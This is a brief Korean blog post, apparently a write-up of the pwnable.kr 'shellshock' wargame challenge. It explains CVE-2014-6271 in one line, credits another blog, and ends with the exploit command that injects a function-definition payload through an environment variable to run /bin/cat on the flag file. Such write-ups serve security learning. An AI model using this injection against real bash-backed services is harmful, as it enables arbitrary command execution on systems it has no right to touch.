pwnable.kr - shellshock

이번에 작성할 shellshock취약점은 CVE-2014-6271입니다.

CVE라니 신기했어요 ㅎㅎ

shellshock이 뭘까요..?

http://baobob1024.tistory.com/42

이분의 블로그를 참고해서 많이 배웠습니다.

"입력값 이 제대로 검사되지않는 버그라고 보시면 간편할 것 같습니다"

익스방법은 다음과 같습니다.

exploit = env x='() { :;}; /bin/cat flag' ./shellshock

(grin)